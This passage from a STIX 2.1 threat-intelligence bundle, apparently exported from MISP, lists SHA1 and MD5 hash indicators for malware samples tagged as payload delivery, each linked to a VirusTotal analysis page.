|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80c0-129c-49c9-af8a-44aa02de0b81",
|
|
"value": "https://www.virustotal.com/file/f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c/analysis/1478073853/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c1-8af8-41c2-8f75-47d502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:13.000Z",
|
|
"modified": "2017-03-29T09:39:13.000Z",
|
|
"description": "sample - Xchecked via VT: f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4",
|
|
"pattern": "[file:hashes.SHA1 = '7f3c9667ab83db2629cdb7ea20862756c02a8cd4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c2-4428-4d95-9ef2-4cab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:14.000Z",
|
|
"modified": "2017-03-29T09:39:14.000Z",
|
|
"description": "sample - Xchecked via VT: f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4",
|
|
"pattern": "[file:hashes.MD5 = 'a73d81813e4190ad3a49eaec50d9f900']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80c3-58f0-48db-af0c-4b5002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:15.000Z",
|
|
"modified": "2017-03-29T09:39:15.000Z",
|
|
"first_observed": "2017-03-29T09:39:15Z",
|
|
"last_observed": "2017-03-29T09:39:15Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80c3-58f0-48db-af0c-4b5002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80c3-58f0-48db-af0c-4b5002de0b81",
|
|
"value": "https://www.virustotal.com/file/f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4/analysis/1479068434/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c4-a078-4cfd-b22b-426902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:16.000Z",
|
|
"modified": "2017-03-29T09:39:16.000Z",
|
|
"description": "sample - Xchecked via VT: 5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12",
|
|
"pattern": "[file:hashes.SHA1 = '443dd4e3f0dc8a6d1a3e4e619f03f4de5578a501']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c5-b8a4-4331-9d90-4a6102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:17.000Z",
|
|
"modified": "2017-03-29T09:39:17.000Z",
|
|
"description": "sample - Xchecked via VT: 5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12",
|
|
"pattern": "[file:hashes.MD5 = 'd1420b3f01cd9144b4dafe1ac6752e5b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80c6-631c-4786-a417-40b502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:18.000Z",
|
|
"modified": "2017-03-29T09:39:18.000Z",
|
|
"first_observed": "2017-03-29T09:39:18Z",
|
|
"last_observed": "2017-03-29T09:39:18Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80c6-631c-4786-a417-40b502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80c6-631c-4786-a417-40b502de0b81",
|
|
"value": "https://www.virustotal.com/file/5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12/analysis/1490420628/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c7-f1ac-4ece-86fd-4acf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:19.000Z",
|
|
"modified": "2017-03-29T09:39:19.000Z",
|
|
"description": "sample - Xchecked via VT: c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223",
|
|
"pattern": "[file:hashes.SHA1 = '7ee7ca28957f274709574b57abf07428ec03ade7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80c8-2fa0-495a-8536-45aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:20.000Z",
|
|
"modified": "2017-03-29T09:39:20.000Z",
|
|
"description": "sample - Xchecked via VT: c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223",
|
|
"pattern": "[file:hashes.MD5 = '599109a4302eb79d8fc9d7fe33b409a3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80c9-4f14-4fe9-954a-428302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:21.000Z",
|
|
"modified": "2017-03-29T09:39:21.000Z",
|
|
"first_observed": "2017-03-29T09:39:21Z",
|
|
"last_observed": "2017-03-29T09:39:21Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80c9-4f14-4fe9-954a-428302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80c9-4f14-4fe9-954a-428302de0b81",
|
|
"value": "https://www.virustotal.com/file/c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223/analysis/1476076394/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ca-cd80-4a36-aef1-421402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:22.000Z",
|
|
"modified": "2017-03-29T09:39:22.000Z",
|
|
"description": "sample - Xchecked via VT: b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9",
|
|
"pattern": "[file:hashes.SHA1 = '038e6c5ae4962a4050383bdd134241146d9666c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ca-160c-4820-931b-457d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:22.000Z",
|
|
"modified": "2017-03-29T09:39:22.000Z",
|
|
"description": "sample - Xchecked via VT: b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9",
|
|
"pattern": "[file:hashes.MD5 = '807e4648a507cb30f8f9c364c41384e9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80cb-70dc-4e20-ac7c-4d5c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:23.000Z",
|
|
"modified": "2017-03-29T09:39:23.000Z",
|
|
"first_observed": "2017-03-29T09:39:23Z",
|
|
"last_observed": "2017-03-29T09:39:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80cb-70dc-4e20-ac7c-4d5c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80cb-70dc-4e20-ac7c-4d5c02de0b81",
|
|
"value": "https://www.virustotal.com/file/b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9/analysis/1432820054/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80cc-4de8-4e36-925b-4a3602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:24.000Z",
|
|
"modified": "2017-03-29T09:39:24.000Z",
|
|
"description": "sample - Xchecked via VT: 5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c",
|
|
"pattern": "[file:hashes.SHA1 = '32dd88f0fe22a42e085888978fdcae9b544138b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80cd-3238-4a10-9dec-486502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:25.000Z",
|
|
"modified": "2017-03-29T09:39:25.000Z",
|
|
"description": "sample - Xchecked via VT: 5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c",
|
|
"pattern": "[file:hashes.MD5 = 'fa8ad53b3e6aa5dca000ad6b72735eec']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80ce-b354-4e0e-b7cf-43d102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:26.000Z",
|
|
"modified": "2017-03-29T09:39:26.000Z",
|
|
"first_observed": "2017-03-29T09:39:26Z",
|
|
"last_observed": "2017-03-29T09:39:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80ce-b354-4e0e-b7cf-43d102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80ce-b354-4e0e-b7cf-43d102de0b81",
|
|
"value": "https://www.virustotal.com/file/5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c/analysis/1434148700/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80cf-f640-4c3f-a546-400202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:27.000Z",
|
|
"modified": "2017-03-29T09:39:27.000Z",
|
|
"description": "sample - Xchecked via VT: 6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692",
|
|
"pattern": "[file:hashes.SHA1 = '054d8c79ee8465e51d6a50ccbe2f1a3f4cec14e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d0-a8cc-4ab8-befb-406202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:28.000Z",
|
|
"modified": "2017-03-29T09:39:28.000Z",
|
|
"description": "sample - Xchecked via VT: 6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692",
|
|
"pattern": "[file:hashes.MD5 = 'bf48ec2fa165fa963b08cce277be799f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80d1-e0ac-4574-abf7-427502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:29.000Z",
|
|
"modified": "2017-03-29T09:39:29.000Z",
|
|
"first_observed": "2017-03-29T09:39:29Z",
|
|
"last_observed": "2017-03-29T09:39:29Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80d1-e0ac-4574-abf7-427502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80d1-e0ac-4574-abf7-427502de0b81",
|
|
"value": "https://www.virustotal.com/file/6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692/analysis/1432722058/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d2-7b10-495b-ac4b-478902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:30.000Z",
|
|
"modified": "2017-03-29T09:39:30.000Z",
|
|
"description": "sample - Xchecked via VT: 09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305",
|
|
"pattern": "[file:hashes.SHA1 = '240bf11d101bc9adacfb75f7cf3d9b3187a9e355']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d3-a7d0-4f54-bd5d-47df02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:31.000Z",
|
|
"modified": "2017-03-29T09:39:31.000Z",
|
|
"description": "sample - Xchecked via VT: 09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305",
|
|
"pattern": "[file:hashes.MD5 = 'fcd1dc4fd1d63c11295077dedecedbf5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80d4-0468-4683-aa6b-4d4e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:32.000Z",
|
|
"modified": "2017-03-29T09:39:32.000Z",
|
|
"first_observed": "2017-03-29T09:39:32Z",
|
|
"last_observed": "2017-03-29T09:39:32Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80d4-0468-4683-aa6b-4d4e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80d4-0468-4683-aa6b-4d4e02de0b81",
|
|
"value": "https://www.virustotal.com/file/09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305/analysis/1447247918/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d5-9198-413d-a6d0-43ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:33.000Z",
|
|
"modified": "2017-03-29T09:39:33.000Z",
|
|
"description": "sample - Xchecked via VT: 76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da",
|
|
"pattern": "[file:hashes.SHA1 = 'a2b7561d3b0f76cb285e0ebfc744ba3fcd468886']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d6-46e8-4ed5-ac00-46c302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:34.000Z",
|
|
"modified": "2017-03-29T09:39:34.000Z",
|
|
"description": "sample - Xchecked via VT: 76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da",
|
|
"pattern": "[file:hashes.MD5 = 'af755f9db0662196a88bd42355f6ada8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80d7-e048-4348-b2d9-41c702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:35.000Z",
|
|
"modified": "2017-03-29T09:39:35.000Z",
|
|
"first_observed": "2017-03-29T09:39:35Z",
|
|
"last_observed": "2017-03-29T09:39:35Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80d7-e048-4348-b2d9-41c702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80d7-e048-4348-b2d9-41c702de0b81",
|
|
"value": "https://www.virustotal.com/file/76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da/analysis/1434010744/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d8-7520-4f14-99cb-40d302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:36.000Z",
|
|
"modified": "2017-03-29T09:39:36.000Z",
|
|
"description": "sample - Xchecked via VT: f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff",
|
|
"pattern": "[file:hashes.SHA1 = '48f44b181ef620a64c212140ad220df3994416b5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80d9-3a80-4748-8b77-46ac02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:37.000Z",
|
|
"modified": "2017-03-29T09:39:37.000Z",
|
|
"description": "sample - Xchecked via VT: f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff",
|
|
"pattern": "[file:hashes.MD5 = '4fe1959a67e681bd8d389994f385ae3f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80da-5000-4ca8-8f02-41df02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:38.000Z",
|
|
"modified": "2017-03-29T09:39:38.000Z",
|
|
"first_observed": "2017-03-29T09:39:38Z",
|
|
"last_observed": "2017-03-29T09:39:38Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80da-5000-4ca8-8f02-41df02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80da-5000-4ca8-8f02-41df02de0b81",
|
|
"value": "https://www.virustotal.com/file/f33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff/analysis/1485816688/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80db-8fdc-4930-aba9-42cc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:39.000Z",
|
|
"modified": "2017-03-29T09:39:39.000Z",
|
|
"description": "sample - Xchecked via VT: 3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f",
|
|
"pattern": "[file:hashes.SHA1 = '9e68a5a36a7421bb660465306edf74674fc430b1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80dc-166c-4d73-bbd7-4e9902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:40.000Z",
|
|
"modified": "2017-03-29T09:39:40.000Z",
|
|
"description": "sample - Xchecked via VT: 3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f",
|
|
"pattern": "[file:hashes.MD5 = '5580388356250a4fb6fc025cf1eabccc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80dd-9060-4ac9-b77c-4ba602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:41.000Z",
|
|
"modified": "2017-03-29T09:39:41.000Z",
|
|
"first_observed": "2017-03-29T09:39:41Z",
|
|
"last_observed": "2017-03-29T09:39:41Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
